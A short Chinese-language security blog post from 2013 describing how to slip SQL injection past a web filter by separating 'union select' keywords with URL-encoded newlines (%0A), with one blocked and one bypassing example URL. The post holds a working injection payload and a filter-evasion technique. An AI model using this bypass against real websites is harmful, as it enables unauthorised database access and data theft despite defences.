GET参数SQL注入%0A换行污染绕过

分类:安全 | 2013-06-30 | 撸过 183 次
2人扯谈

绕过描述:

在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。

 

测试方法:

请求测试url:https://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4  — 被拦截

 

请求测试url:https://www.webshell.cc/1.php?id=-9%0Aunion%0Aselect 1,2,3,4   —- 绕过

本站内容均为原创,转载请务必保留署名与链接!
GET参数SQL注入%0A换行污染绕过:https://www.webshell.cc/4362.html

随机日志